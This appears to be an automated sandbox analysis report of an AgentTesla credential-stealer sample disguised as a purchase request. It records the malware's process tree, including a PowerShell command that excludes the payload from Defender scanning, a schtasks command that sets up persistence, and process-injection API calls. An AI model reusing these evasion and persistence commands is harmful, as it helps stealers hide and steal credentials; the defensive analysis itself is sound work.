                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:03:57:55
                                                        Start date:06/12/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vmPeKTe.exe"
                                                        Imagebase:0xf30000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:03:57:55
                                                        Start date:06/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:7
                                                        Start time:03:57:55
                                                        Start date:06/12/2024
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vmPeKTe" /XML "C:\Users\user\AppData\Local\Temp\tmpDF64.tmp"
                                                        Imagebase:0x860000
                                                        File size:187'904 bytes
                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:8
                                                        Start time:03:57:55
                                                        Start date:06/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:9
                                                        Start time:03:57:55
                                                        Start date:06/12/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                        Imagebase:0x350000
                                                        File size:45'984 bytes
                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:10
                                                        Start time:03:57:55
                                                        Start date:06/12/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                        Imagebase:0x910000
                                                        File size:45'984 bytes
                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1483006470.0000000002D1C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1483006470.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1483006470.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1481076677.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1481076677.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:11
                                                        Start time:03:57:57
                                                        Start date:06/12/2024
                                                        Path:C:\Users\user\AppData\Roaming\vmPeKTe.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\vmPeKTe.exe
                                                        Imagebase:0xe0000
                                                        File size:785'408 bytes
                                                        MD5 hash:2293CE96EC6BF9E7D7214091D74E4C35
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 58%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:12
                                                        Start time:03:57:58
                                                        Start date:06/12/2024
                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                        Imagebase:0x7ff605670000
                                                        File size:496'640 bytes
                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:13
                                                        Start time:03:58:01
                                                        Start date:06/12/2024
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vmPeKTe" /XML "C:\Users\user\AppData\Local\Temp\tmpF3B7.tmp"
                                                        Imagebase:0x860000
                                                        File size:187'904 bytes
                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:14
                                                        Start time:03:58:01
                                                        Start date:06/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:15
                                                        Start time:03:58:01
                                                        Start date:06/12/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                        Imagebase:0x940000
                                                        File size:45'984 bytes
                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3874134304.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.3874134304.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:10.8%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:13.8%
                                                          Total number of Nodes:65
                                                          Total number of Limit Nodes:3
                                                          execution_graph 31485 9e8ca28 31486 9e8ca73 ReadProcessMemory 31485->31486 31488 9e8cab7 31486->31488 31525 9e8c938 31526 9e8c980 WriteProcessMemory 31525->31526 31528 9e8c9d7 31526->31528 31529 9e8c878 31530 9e8c8b8 VirtualAllocEx 31529->31530 31532 9e8c8f5 31530->31532 31533 a797c68 31534 a797ca2 31533->31534 31535 a797d1e 31534->31535 31536 a797d33 31534->31536 31541 a796784 31535->31541 31538 a796784 3 API calls 31536->31538 31540 a797d42 31538->31540 31543 a79678f 31541->31543 31542 a797d29 31543->31542 31546 a798728 31543->31546 31552 a79872a 31543->31552 31558 a7967dc 31546->31558 31549 a79874f 31549->31542 31550 a798778 CreateIconFromResourceEx 31551 a7987f6 31550->31551 31551->31542 31553 a798742 31552->31553 31554 a7967dc CreateIconFromResourceEx 31552->31554 31555 a79874f 31553->31555 31556 a798778 CreateIconFromResourceEx 31553->31556 31554->31553 31555->31542 31557 a7987f6 31556->31557 31557->31542 31559 a798778 CreateIconFromResourceEx 31558->31559 31560 a798742 31559->31560 31560->31549 31560->31550 31489 9e8c7a0 31490 9e8c7e5 Wow64SetThreadContext 31489->31490 31492 9e8c82d 31490->31492 31561 9e8c6f0 31562 9e8c730 ResumeThread 31561->31562 31564 9e8c761 31562->31564 31565 9e8cbc0 31566 9e8cc49 CreateProcessA 31565->31566 31568 9e8ce0b 31566->31568 31493 3139dd8 31494 3139dfa 31493->31494 31497 3139c3c 31494->31497 31496 3139e51 31498 3139c47 31497->31498 31501 3139c4c 31498->31501 31500 313a4a2 31500->31496 31502 3139c57 31501->31502 31505 3139c6c 31502->31505 31504 313a7b5 31504->31500 31506 3139c77 31505->31506 31509 3139c9c 31506->31509 31508 313a89a 31508->31504 31510 3139ca7 31509->31510 31513 3139ccc 31510->31513 31512 313a99c 31512->31508 31514 3139cd7 31513->31514 31517 313d660 31514->31517 31516 313d7d8 31516->31512 31518 313d66b 31517->31518 31519 313f25a 31518->31519 31521 313f2b8 31518->31521 31519->31516 31522 313f2fb 31521->31522 31523 313f306 KiUserCallbackDispatcher 31522->31523 31524 313f330 31522->31524 31523->31524 31524->31519

                                                          Executed Functions

                                                          Function 03131C5A Relevance: 5.1, Strings: 4, Instructions: 146COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 3131c5a-3131c89 1 3131c90-3131cb5 0->1 2 3131c8b 0->2 3 3131cb7 1->3 4 3131cbc-3131cc8 1->4 2->1 3->4 5 3131ccb 4->5 6 3131cd2-3131cee 5->6 7 3131cf0 6->7 8 3131cf7-3131cf8 6->8 7->5 7->8 9 3131d92-3131d99 7->9 10 3131d11-3131d28 7->10 11 3131e30-3131e40 7->11 12 3131de7-3131dea 7->12 13 3131e0a-3131e2b 7->13 14 3131d5a-3131d64 7->14 15 3131d2a-3131d2e 7->15 16 3131cfd-3131d0f 7->16 8->11 17 3131da0-3131de2 9->17 18 3131d9b 9->18 10->6 27 3131ded call 3131e70 12->27 28 3131ded call 3131e80 12->28 13->6 21 3131d66 14->21 22 3131d6b-3131d8d 14->22 19 3131d41-3131d48 15->19 20 3131d30-3131d3f 15->20 16->6 17->6 18->17 25 3131d4f-3131d55 19->25 20->25 21->22 22->6 23 3131df3-3131e05 23->6 25->6 27->23 28->23
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,[P$,[P$<-%$mw(
                                                          • API String ID: 0-3814939158
                                                          • Opcode ID: 3e1a3e4ed329662643790cc68b37f91674b43c71bc6deac1a2186b02d3cdcc93
                                                          • Instruction ID: 7512dd44fed6d75ee1b9cf8d4b48b640ca8d932d9b773577ea7eff7261b6ac36
                                                          • Opcode Fuzzy Hash: 3e1a3e4ed329662643790cc68b37f91674b43c71bc6deac1a2186b02d3cdcc93
                                                          • Instruction Fuzzy Hash: 51511470E0520A9FDB08DFAAC8416AEFBF2BB8D301F15D52AD419B7254D7349A418FA4
                                                          Function 0313132B Relevance: 2.8, Strings: 2, Instructions: 258COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 143 313132b-3131340 144 3131342-3131350 143->144 145 3131351-3131360 143->145 144->145 146 3131362-3131367 145->146 147 313136b-31313d3 145->147 146->147 148 31313d5 147->148 149 31313da-3131434 call 31300e4 147->149 148->149 153 3131437 149->153 154 313143e-313145a 153->154 155 3131463-3131464 154->155 156 313145c 154->156 162 31315e5-3131655 call 31300f4 155->162 165 3131469-3131491 155->165 156->153 157 3131493-31314bd 156->157 158 31314c2-31314ca call 3131c5a 156->158 159 3131522-3131537 156->159 160 3131561-313158f 156->160 161 31314e7-313151d 156->161 156->162 163 31315b5-31315b9 156->163 164 3131594-31315b0 156->164 156->165 166 313153c-313155c 156->166 157->154 169 31314d0-31314e2 158->169 159->154 160->154 161->154 184 3131657 call 3132671 162->184 185 3131657 call 3132be1 162->185 186 3131657 call 3132768 162->186 187 3131657 call 313274e 162->187 167 31315bb-31315ca 163->167 168 31315cc-31315d3 163->168 164->154 165->154 166->154 170 31315da-31315e0 167->170 168->170 169->154 170->154 182 313165d-3131667 184->182 185->182 186->182 187->182
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @cfV$@cfV
                                                          • API String ID: 0-2473636
                                                          • Opcode ID: dc11b355604438a42b39d80f832045b5a50bedf5b0b4a467d1f72ed7f4d9b546
                                                          • Instruction ID: 29188103be4ac352726e91bb93776d176945a7fcfefc744f471afc17262fb196
                                                          • Opcode Fuzzy Hash: dc11b355604438a42b39d80f832045b5a50bedf5b0b4a467d1f72ed7f4d9b546
                                                          • Instruction Fuzzy Hash: 67B10374E012198FDB08DFAAC880A9DBBF2FF8A310F289569D415AB358D734A945CF51
                                                          Function 031313B0 Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 188 31313b0-31313d3 189 31313d5 188->189 190 31313da-3131434 call 31300e4 188->190 189->190 194 3131437 190->194 195 313143e-313145a 194->195 196 3131463-3131464 195->196 197 313145c 195->197 203 31315e5-3131655 call 31300f4 196->203 206 3131469-3131491 196->206 197->194 198 3131493-31314bd 197->198 199 31314c2-31314ca call 3131c5a 197->199 200 3131522-3131537 197->200 201 3131561-313158f 197->201 202 31314e7-313151d 197->202 197->203 204 31315b5-31315b9 197->204 205 3131594-31315b0 197->205 197->206 207 313153c-313155c 197->207 198->195 210 31314d0-31314e2 199->210 200->195 201->195 202->195 225 3131657 call 3132671 203->225 226 3131657 call 3132be1 203->226 227 3131657 call 3132768 203->227 228 3131657 call 313274e 203->228 208 31315bb-31315ca 204->208 209 31315cc-31315d3 204->209 205->195 206->195 207->195 211 31315da-31315e0 208->211 209->211 210->195 211->195 223 313165d-3131667 225->223 226->223 227->223 228->223
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @cfV$@cfV
                                                          • API String ID: 0-2473636
                                                          • Opcode ID: 706be296d894cd234216b7ce3964b093677727784c42e4f84e5294b417fade63
                                                          • Instruction ID: d6f1be178fc3e4dcc600eaf597fec4d50254bf77d7f261afa084c4a5938189f6
                                                          • Opcode Fuzzy Hash: 706be296d894cd234216b7ce3964b093677727784c42e4f84e5294b417fade63
                                                          • Instruction Fuzzy Hash: C391C374E012099FCB08DFAAC9846DEFBB2BF89310F24942AD419BB358D7349946CF54
                                                          Function 0A796784 Relevance: .7, Instructions: 653COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1451441187.000000000A790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_a790000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 71c382383375235ae30490c2cb9d09b058c51d26a80afb16a671e8d806d2474b
                                                          • Instruction ID: 22c44a0454a243889af77893d8c1d482c0d438de3d14e503f32736c1665c9c29
                                                          • Opcode Fuzzy Hash: 71c382383375235ae30490c2cb9d09b058c51d26a80afb16a671e8d806d2474b
                                                          • Instruction Fuzzy Hash: 31425C70A003189FDF54DFA8D8547AEBBF6AF89300F14C16AD409AB385DB749989CF91
                                                          Function 09E8183A Relevance: .4, Instructions: 400COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450462274.0000000009E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_9e80000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7beb09e0d238ad552f92c998ade7b782ab84047415be51d99a3d93a24ae6f19a
                                                          • Instruction ID: 14362e2b85f286e5d37690cb04d2cc8d19b71798810c150e0126fa1331dd79f6
                                                          • Opcode Fuzzy Hash: 7beb09e0d238ad552f92c998ade7b782ab84047415be51d99a3d93a24ae6f19a
                                                          • Instruction Fuzzy Hash: C1E1AE30E08244CFD714ABE8D8817ABBBB1EB84344F10966AE55EDB291D7749C47CB91
                                                          Function 03133543 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 759f705771b5792ec81a014deb71024ac4f5f1929176af5ef61bc52b0a7038fd
                                                          • Instruction ID: f6f2e273f0d03edf86d4ffd392f126af90e8c1870509d2b5bd52658f2220c508
                                                          • Opcode Fuzzy Hash: 759f705771b5792ec81a014deb71024ac4f5f1929176af5ef61bc52b0a7038fd
                                                          • Instruction Fuzzy Hash: 2AD14E74E05209DFDB08CFA9C4848AEFBB2FF8A301B55D955C425AB218D734EA42CF94
                                                          Function 03133590 Relevance: .3, Instructions: 290COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 57fb02fdd0080049decc47f19d14ded0e4672ab8c641c221553ce53b0f720b34
                                                          • Instruction ID: c2ed631ba49a79054f351cbd8c80417f0d1555cefd62351e18f7be2118e1a801
                                                          • Opcode Fuzzy Hash: 57fb02fdd0080049decc47f19d14ded0e4672ab8c641c221553ce53b0f720b34
                                                          • Instruction Fuzzy Hash: FDD12B74E0520ADFCB08CF99C4804AEFBB2FF8A701B55D959C425BB214D7349A82CF98
                                                          Function 0A797D54 Relevance: .3, Instructions: 280COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1451441187.000000000A790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_a790000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a5c4b1512d465e00a1492c349acf479adec5529c8adbe7810932639e05b064e
                                                          • Instruction ID: 207f8d8670d480bae46e0adcfbc9875d297ff32b64bec93c56013f8e9fae992c
                                                          • Opcode Fuzzy Hash: 2a5c4b1512d465e00a1492c349acf479adec5529c8adbe7810932639e05b064e
                                                          • Instruction Fuzzy Hash: E1C15931A002189FCF14CFA9E88079EBFB2BF89310F14C5AAD409AB255DB35D989CF51
                                                          Function 0A79677C Relevance: .3, Instructions: 280COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1451441187.000000000A790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_a790000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 27463e3b39cf951eaa9eb22f58d03f298e922bf0a5c9ce140ee1660b661dd2c1
                                                          • Instruction ID: 08c748a2cf2ef7fdf72adba39b37edaf07f85b8f5f621ee7553377e2e95effbb
                                                          • Opcode Fuzzy Hash: 27463e3b39cf951eaa9eb22f58d03f298e922bf0a5c9ce140ee1660b661dd2c1
                                                          • Instruction Fuzzy Hash: DAC14831A002189FDF14CFA9E88079EBFB2BF89300F14C5AAD409AB255DB35D989CF51
                                                          Function 0313A3E8 Relevance: .2, Instructions: 215COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 36c6d25c530b321ed07d7899b3167b7c708640cdd30cdc8e16c3fe6129b06b1e
                                                          • Instruction ID: 4264aa9304332f4c1bb272a6d4c35d27d8ca4fe78571b5e5fa053d4ffdd56e5b
                                                          • Opcode Fuzzy Hash: 36c6d25c530b321ed07d7899b3167b7c708640cdd30cdc8e16c3fe6129b06b1e
                                                          • Instruction Fuzzy Hash: 0391C074E00209AFDB08DFAAE9546EDFBF2BF89310F148069D419AB364DB359942CF51
                                                          Function 03139C3C Relevance: .2, Instructions: 211COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 92659b36d8d5ff1eb254ddec292473144787dd2bfa7232b3b7616e06640a002e
                                                          • Instruction ID: b3ee953ee554168d8636f6a011ca8deb3b833e3be827149c9d489a1cf2ae4b18
                                                          • Opcode Fuzzy Hash: 92659b36d8d5ff1eb254ddec292473144787dd2bfa7232b3b7616e06640a002e
                                                          • Instruction Fuzzy Hash: F191C274E00209AFDB08DFAAD9546EDBBF2FF89310F148069D419AB364DB359942CF51
                                                          Function 03130871 Relevance: .1, Instructions: 109COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d5be362a0da60a2bd32dd53286bdf31d94c6fcad5a6e9c2f9549aa459b7fb5b0
                                                          • Instruction ID: a427d4a0542df02777ca0eeb6abfb083a33dd399240f90e62d527ade819aa132
                                                          • Opcode Fuzzy Hash: d5be362a0da60a2bd32dd53286bdf31d94c6fcad5a6e9c2f9549aa459b7fb5b0
                                                          • Instruction Fuzzy Hash: C941F671E01218DFEB18DFAAD84079EFBB3AFC9200F14C5AAD419A6214DB744A858F51
                                                          Function 03132671 Relevance: .1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7803e68804ef3f0176d6eceff9cdfd599daf347be6ae30fd0e6e382929b208b4
                                                          • Instruction ID: 9995f5ac91c1f5c9a34e878ed13074f7cd41b0f1f4db2dc77b9f346445b47db9
                                                          • Opcode Fuzzy Hash: 7803e68804ef3f0176d6eceff9cdfd599daf347be6ae30fd0e6e382929b208b4
                                                          • Instruction Fuzzy Hash: 2A311771E012188FDB18CFAAD8446DEBBB2AFC9301F14C1A9D409AB358DB745A85CF40
                                                          Function 03139DD8 Relevance: .1, Instructions: 66COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7649ce18bf2f3493aec6c6bd25bde1b18df64bd014e15bd8dedc957aba4400c3
                                                          • Instruction ID: efc8321b24aa8285dcf3ed236c632fa0f5db166d75daf77cb089ea30a0579f33
                                                          • Opcode Fuzzy Hash: 7649ce18bf2f3493aec6c6bd25bde1b18df64bd014e15bd8dedc957aba4400c3
                                                          • Instruction Fuzzy Hash: DB21CC71E046089BEB0CCFABD94069EFBF7AFC9300F14C03AD919AB254EB3445568B11
                                                          Function 03139DC9 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1426353833.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3130000_REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8007a3d1ac7ccc5f1fb3ea8d3b34b908b39cf03c7d0bd295eb8b6f07189f479e
                                                          • Instruction ID: 993c65ae1c09bd96d75e82070beae2e836346a3e136fa06ca2d324101da28986
                                                          • Opcode Fuzzy Hash: 8007a3d1ac7ccc5f1fb3ea8d3b34b908b39cf03c7d0bd295eb8b6f07189f479e
                                                          • Instruction Fuzzy Hash: 5921CF75E056498BEB0CCFABD94069EFBF3AFC9300F18C03AD819AA255EB7445468B51
                                                          Function 09E8CBB6 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 246processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
